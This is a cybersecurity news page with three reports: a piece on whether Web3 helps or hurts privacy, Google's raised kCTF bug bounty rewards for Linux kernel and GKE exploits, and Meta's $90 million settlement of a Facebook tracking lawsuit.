The Internet that most of us are a part of today is known as the Web2 — a place where we are beholden to centralized entities who control the flow of information while monopolizing and profiting off our data. The era of Web2, as some claim, may soon come to an end as we have recently reached the critical juncture of a newer, more decentralized internet known as the Web3.

The term Web3 or Web 3.0 has been garnering much of the online world’s attention lately. While it is not something new, it is, at its core, a vision of the future of the internet that promotes decentralized concepts, mainly to reduce dependency on Big Tech like Meta, Google and Amazon. In fact, last month, Opera launched a beta version of its “Crypto Browser Project”, an internet browser with built-in Web3 integrations.

Proponents argue that web3 will improve user privacy by putting individuals in control of their data, via distributed personal data stores. But critics say that the transparent nature of public distributed ledgers, which make transactions visible to all participants, is antithetical to privacy.

The duality of Web3: Privacy or transparency? 

For starters, the term Web3 was first coined by Gavin Wood eight years ago. In a 2014 blog post, Wood reckoned how “entrusting our information to organizations in general is a fundamentally broken model.” He basically sold the idea that the future of the internet is a place where ownership and power are more widely and evenly distributed. 

To be precise, Wood’s vision is based on transparent digital ledgers known as blockchains — the technology that underpins cryptocurrencies — and with that, ‘Big Tech’ companies will be rivaled by more democratized forms of internet governance, where the user will get a say. “Web 3.0, or as might be termed the “post-Snowden” web, is a re-imagination of the sorts of things we already use the web for, but with a fundamentally different model for the interactions between parties,” he said.

Elaborating further on this, he added, “Information that we assume to be public, we publish. Information we assume to be agreed upon, we place on a consensus ledger. Information that we assume to be private, we keep secret and never reveal. Communication always takes place over encrypted channels and only with pseudonymous identities as endpoints; never with anything traceable (such as IP addresses).”

In short, Web3 promises to release us from the shackles of tech giants by enabling everyone to access data living on the blockchain. While it is certainly appealing that institutions no longer have the power to hold our data hostage, it is still important to consider: what does the public and transparent nature of web3 mean for our privacy?

To some, like Tor Bair, co-founder of the privacy-focused blockchain Secret Network, “Web3 requires you to give up privacy entirely. NFTs and blockchains are all public-by-default and terrible for ownership and security.”

Separately, according to a blog posting by the National University of Singapore (NUS), data security concerns are not eliminated completely with Web3. “Security issues on the next Internet phase go beyond data. For example, transacting anonymously on distributed ledgers currently comes with risks such as smart contract logic hacks and the lack of legal protection when things go wrong,” it said.

When it comes to the privacy legislation perspective, decentralization simply makes it difficult to identify the personally identifiable information (PII) controller and the PII processor, NUS believes. “Due to its lack of central control and access to data, Web 3.0 could make it even more difficult to police cybercrime, including online harassment, hate speech and child abuse images,” the blog posting reads.

NUS reckons regulators, businesses, and consumers alike will have to start rethinking how cybersecurity and privacy issues are handled through the lens of Web3, to keep pace with the evolving landscape.


Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Google Offering $91,000 Rewards for Linux Kernel, GKE Zero-Days


Technology giant Google is offering bigger cash awards for hackers reporting critical security flaws affecting the Linux Kernel, GKE, Kubernetes, and kCTF.

In November last year, Google tripled the bug bounty rewards for Linux kernel flaws reported through its Vulnerability Rewards Program (VRP), for payouts of up to $50,337 for zero-day issues.

This week, the company announced it is nearly doubling that amount and offering a maximum reward of $91,337 for exploits that meet certain criteria. The maximum payout includes a base reward and three bonuses.

The base reward for the first exploit submitted for a certain vulnerability is $31,337, with no reward being offered for duplicate exploits.


However, the search advertising giant is offering a bonus of $20,000 for zero-day security bugs (paid for the first valid exploit), another $20,000 bonus for vulnerabilities that do not require unprivileged user namespaces (paid for the first valid exploit), and a third $20,000 bonus for exploits using novel exploit techniques (paid for duplicate exploits too).

The new rewards structure also offers participating researchers the possibility to earn as much as $71,337 for 1-day exploits, and at least $20,000 for duplicate exploits that use novel techniques.

However, Google said it would also limit the number of rewards for 1-days to only one per version/build. “There are 12-18 GKE releases per year on each channel, and we have two clusters on different channels, so we will pay the 31,337 USD base rewards up to 36 times (no limit for the bonuses).”

The company recommends that researchers test their exploits in their own kCTF clusters, to make sure that no other VRP participants can access the exploit.

Furthermore, the company says that, moving forward, zero-day submissions no longer have to include a flag at first, that 1-day reports should include links to patches, and that the same form can be used to submit both exploits and flags.

“If you had submitted an exploit checksum for a 0day, please make sure that you include the original exploit as well as the final exploit and make sure to submit it within a week after the patch is merged on mainline,” Google added.

The company is now using a cluster for the REGULAR release channel and another for the RAPID release channel, to provide bug hunters with increased flexibility.

Since launching the expansion of kCTF VRP in November 2021, Google received nine vulnerability submissions — including five zero-days and two 1-days — and paid more than $175,000 in bug bounty rewards.


Meta Agrees $90M Settlement in Facebook Privacy Suit


Facebook-parent Meta has agreed to pay $90 million to settle a 10-year-old lawsuit accusing it of tracking users online even after they logged off the social network, court records show.

The agreement was filed Monday in a California court and, if approved by a judge, would put to rest one of a series of suits alleging the social media giant invaded users’ privacy.

“Reaching a settlement in this case, which is more than a decade old, is in the best interest of our community and our shareholders and we’re glad to move past this issue,” Meta spokesperson Drew Pusateri told AFP.

The suit alleged the social media giant violated privacy guidelines by tracking its users’ visits to outside web pages that contained Facebook “like” buttons in order to better target ads.

That tracking contradicted assurances given by Facebook at the time, according to court filings.

The suit, which consolidated state and federal litigation, represented people who had active Facebook accounts between early 2010 and late 2011.

Facebook was able to tell when someone loaded a page embedded with its content, such as a “like” button, and could link the data back to users’ profiles, according to legal filings.

The issue raised in the suit has been addressed and does not affect Facebook users, according to the social network.

The proposed settlement calls for Meta to pay $90 million into a claims fund and delete all data the suit argued was wrongly collected.

Meta and other US internet giants are in the crosshairs of privacy advocates, users and regulators regarding how they use people’s data and software “cookies” that track online behavior.

